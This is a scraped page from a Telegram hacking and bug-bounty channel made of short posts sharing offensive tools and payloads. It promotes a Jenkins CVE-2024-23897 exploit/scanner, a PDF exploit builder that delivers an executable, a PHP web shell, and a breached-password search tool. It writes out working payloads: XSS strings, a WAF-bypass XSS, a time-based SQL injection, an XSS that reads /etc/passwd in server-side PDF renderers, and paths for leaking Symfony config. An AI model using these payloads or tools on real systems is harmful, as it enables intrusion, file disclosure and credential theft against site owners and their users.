BugCod3
7.26K subscribers
334 photos
6 videos
7 files
443 links
[ BugCod3 ] โ€” From Shadows To Shells โšก๏ธ

๐Ÿ•ถ Hacking | ๐Ÿž Bug Bounty | ๐Ÿ” Security Tools
โš”๏ธ Learn โ€ข Hunt โ€ข Dominate

๐Ÿ‘ฅ Group: T.me/BugCod3GP
๐Ÿ“‚ Topic: T.me/BugCod3Topic

๐ŸŒ Web: BugCod3.com
๐Ÿค– Contact: T.me/BugCod3BOT
๐Ÿ“ง Email: BugCod3@protonmail.com
Download Telegram
๐Ÿฆ‡ CVE-2024-23897 | Jenkins <= 2.441 & <= LTS 2.426.2 PoC and scanner ๐Ÿฆ‡

๐Ÿ’ฌ Description:
Exploitation and scanning tool specifically designed for Jenkins versions <= 2.441 & <= LTS 2.426.2. It leverages CVE-2024-23897 to assess and exploit vulnerabilities in Jenkins instances.

๐Ÿ’ป Usage:
Ensure you have the necessary permissions to scan and exploit the target systems. Use this tool responsibly and ethically.
python CVE-2024-23897.py -t <target> -p <port> -f <file>

or
python CVE-2024-23897.py -i <input_file> -f <file>


๐Ÿ“Š Parameters:
โšช๏ธ -t or --target: Specify the target IP(s). Supports single IP, IP range, comma-separated list, or CIDR block.

โšช๏ธ -i or --input-file: Path to input file containing hosts in the format of http://1.2.3.4:8080/ (one per line).

โšช๏ธ -o or --output-file: Export results to file (optional).

โšช๏ธ -p or --port: Specify the port number. Default is 8080 (optional).

โšช๏ธ -f or --file: Specify the file to read on the target system.

๐Ÿ˜ธ Github

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#CVE #PoC #Scanner
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก4โค3๐Ÿ”ฅ1
10000 h1 disclosed reports

๐Ÿ’ฌ
On 31st Dec 2023, I made it my goal to read 10,000 H1 Reports in 2024 Q1 (i.e. first 3 months) to really understand deep down what kind of bugs are being reported, accepted, or rejected and how exactly I should approach my journey in #bugbounty. Also, I thought, there was no better resource than actual disclosed bug reports. Later I decided to cap my goal at *5000* because I think I nailed the common pattern and already accomplished what I wanted to get out of it.

๐Ÿ˜ธ Github

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#Python #H1 #Report
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก3โค2๐Ÿ”ฅ1๐Ÿ’ฏ1
Google Bug Bounty Dorks Generator

๐ŸŒŽ Site

#BugBounty #Tips
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ“ฃ T.me/BugCod3
๐Ÿ“ฃ T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก2โค1๐Ÿ‘1๐Ÿ”ฅ1๐Ÿ’ฏ1
๐Ÿ•ธ DigitalOcean OpenVPN/SOCKS for Burp Suite

๐Ÿ’ฌ
This Burp extension allows you to spin up a DigitalOcean droplet based on an OpenVPN configuration file. The droplet also functions as a SOCKS5 proxy to allow routing all Burp traffic through the VPN tunnel. The Burp proxy settings are automatically configured to route traffic through the SOCKS5 and OpenVPN droplet.

๐Ÿ‘โ€๐Ÿ—จ How to use:
๐Ÿ”ค Download the JAR from build/libs/digitalocean-droplet-openvpn-all.jar or build from source yourself;
๐Ÿ”ค Load the extension in Burp via the Extensions tab;
๐Ÿ”ค Create a DigitalOcean API token and enter your token on the extension tab "OpenVPN/SOCKS";
๐Ÿ”ค Select an OpenVPN configurataion file (.ovpn)
๐Ÿ”ค Click "Deploy" to start deploying the SOCKS and OpenVPN containers on a fresh droplet, and the extension will take care of the rest;
๐Ÿ”ค Allow up to a few minutes for the Docker image to complete installation before the proxy starts responding

๐Ÿ“Š Features:
โšช๏ธ Remember your DigitalOcean API token;
โšช๏ธ Remember your OpenVPN configuration file and credentials (optional) per project file;
โšช๏ธ Automatically shut down the droplet when Burp closes or the extension is unloaded;
โšช๏ธ A context menu so you can right-click > enable or disable tunnelling through the VPN
โšช๏ธ Opens a Repeater tab to ifconfig.co to easily verify if the VPN is working correctly

๐Ÿ˜ธ Github

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#Burp #Extension #bugbounty
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โค3โšก1๐Ÿ‘1๐Ÿ”ฅ1๐Ÿ’ฏ1
๐—ซ๐—ฆ๐—ฆ ๐—ถ๐—ป ๐˜๐—ต๐—ฒ .๐—ฐ๐˜€๐˜€ ๐—จ๐—ฅ๐—Ÿ ๐—ฝ๐—ฎ๐˜๐—ต

๐—ข๐—ฟ๐—ถ๐—ด๐—ถ๐—ป๐—ฎ๐—น ๐—จ๐—ฅ๐—Ÿ: "target/lib/css/animated.min.css"

๐—ซ๐—ฆ๐—ฆ ๐—™๐—ผ๐˜‚๐—ป๐—ฑ ๐—ถ๐—ป:
"/lib/css/animated.min'"/><script%20>alert(document.domain)<%2fscript>.css"

#BugBounty #Tips
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โค3๐Ÿ‘3๐Ÿ”ฅ3โšก1๐Ÿ’ฏ1
This is very cool. Get cheatsheets in your terminal with a curl command!

โŒจ๏ธ Try this:
curl https://cht.sh/sqlmap

#Tips
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ“ฃ T.me/BugCod3
๐Ÿ“ฃ T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
โค3๐Ÿ‘3โšก1๐Ÿ”ฅ1๐Ÿ’ฏ1
๐Ÿ’€ LeakSearch ๐Ÿ’€

๐Ÿ’ฌ
LeakSearch is a simple tool to search and parse plain text passwords using ProxyNova COMB (Combination Of Many Breaches) over the Internet. You can define a custom proxy and you can also use your own password file, to search using different keywords: such as user, domain or password.
In addition, you can define how many results you want to display on the terminal and export them as JSON or TXT files. Due to the simplicity of the code, it is very easy to add new sources, so more providers will be added in the future.

Requirements:
โšช๏ธ Python 3
โšช๏ธ Install requirements pip install -r requirements.txt

๐Ÿ’ป Usage:
LeakSearch.py [-h] [-d DATABASE] [-k KEYWORD] [-n NUMBER] [-o OUTPUT] [-p PROXY]

๐Ÿ˜ธ Github

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#Python #Search #Parse #Password
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ3โค2โšก1๐Ÿ‘1๐Ÿ’ฏ1
๐Ÿ”ฅ PDF-BUILDER (POC) - (Non Silent) ๐Ÿ”ฅ

๐Ÿ’ฌ
POC Pdf-exploit builder on C#
Exploitable versions: Foxit Reader, Adobe Acrobat V9(maybe).

๐Ÿ’ป Usage:
Put your exe-link and build the PDF-FILE

๐Ÿ˜ธ Github

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#C #PDF #Exploit
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก3๐Ÿ”ฅ3โค2๐Ÿ‘Ž2
๐Ÿ•ท p0wny@shell:~# -- Single-file PHP Shell ๐Ÿ•ท

โš ๏ธ WARNING: THIS SCRIPT IS A SECURITY HOLE. DO NOT UPLOAD IT ON A SERVER UNLESS YOU KNOW WHAT YOU ARE DOING! โš ๏ธ

๐Ÿ’ฌ
p0wny@shell:~# is a very basic, single-file, PHP shell. It can be used to quickly execute commands on a server when pentesting a PHP application. Use it with caution: this script represents a security risk for the server.

๐Ÿ“Š Features:
โšช๏ธ Command history (using arrow keys โ†‘ โ†“)
โšช๏ธ Auto-completion of command and file names (using Tab key)
โšช๏ธ Navigate on the remote file-system (using cd command)
โšช๏ธ Upload a file to the server (using upload <destination_file_name> command)
โšช๏ธ Download a file from the server (using download <file_name> command)

Demo with Docker:
docker build -t p0wny .
docker run -it -p 8080:80 -d p0wny
# open with your browser http://127.0.0.1:8080/shell.php


๐Ÿ˜ธ Github

โฌ‡๏ธ Download
๐Ÿ”’ BugCod3

#PHP #Shell #Pentesting
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ3โšก2โค1
โค18๐Ÿคฃ8
If you find Web frameworks like Symfony, add
'/app_dev.php/_profiler/open?file=app/config/parameters.yml'
to the wordlist, and you may get juicy data.

#BugBounty #Tips
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
๐Ÿ”ฅ5โšก2โค1
Tip for Stored XSS Bypass on Profile Uploader:
+add magic number (jpg , jpeg)
+bypass file extention Protection

Magic Number

#BugBounty #Tips
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
โšก8โค1๐Ÿ‘1
Canarytokens

You'll be familiar with web bugs, the transparent images which track when someone opens an email. They work by embedding a unique URL in a page's image tag, and monitoring incoming GET requests.

Imagine doing that, but for file reads, database queries, process executions or patterns in log files. Canarytokens does all this and more, letting you implant traps in your production systems rather than setting up separate honeypots.

๐ŸŒ Site

#Pentesting #BugBounty
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
โšก5
This media is not supported in your browser
VIEW IN TELEGRAM
Translate JavaScript to other writing systems!

Site

ฮ”YใƒญIแ—ใ‚ณฮž ๐Ÿ‘พ
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
โค2โšก2๐Ÿ”ฅ1
LFI Vulnerability Testing: Key Parameters

?dir={payload}
?action={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?include={payload}
?page={payload}
?locate={payload}
?site={payload}

#BugBounty #infosec
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
โšก2โค1๐Ÿ”ฅ1
For 0Day SQLI in

(app extension)

payload was:
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

#BugBounty #Tips
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
โค2โšก1๐Ÿ‘1๐Ÿ”ฅ1
XSS to Exfiltrate Data from PDFs

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(โ€˜GETโ€™,โ€™file:///etc/hostsโ€™);x.send();</script><script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(โ€˜GETโ€™,โ€™file:///etc/passwdโ€™);x.send();</script>

How to use:
Server Side XSS (Dynamic PDF)

#XSS #PDF
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
๐Ÿ”ฅ3โค2โšก1
โ”Œโ”€โ”€(BugCod3ใ‰ฟkali)-[~]
โ””โ”€$ sudo rm -rf *1402

โ”Œโ”€โ”€(BugCod3ใ‰ฟkali)-[~]
โ””โ”€$ sudo mkdir 1403


#Notification #NewYear
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
โค5โšก1๐Ÿ”ฅ1
If you are testing API, before fuzzing observe these:

1. Does it throw same data for /v1/user and /v1/user

2. Is it case sensitive?

/v1/user => 200 OK

/v1/USER => 200 OK

OR

/v1/user => 200 OK

/v1/User => 404

How is the naming convention used? user_groups or userGroups , etc then you can build your fuzzing wordlist according to this data, but there are always exceptions.

#BugBounty #Tips
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
๐Ÿ‘3โค1โšก1๐Ÿ”ฅ1
Akamai WAF bypass XSS

<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol
contenteditable
onbeforeinput='location=b.value+c.value+d.value'>

#BugBounty #Tips
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ฃ T.me/BugCod3
โšก1โค1๐Ÿ”ฅ1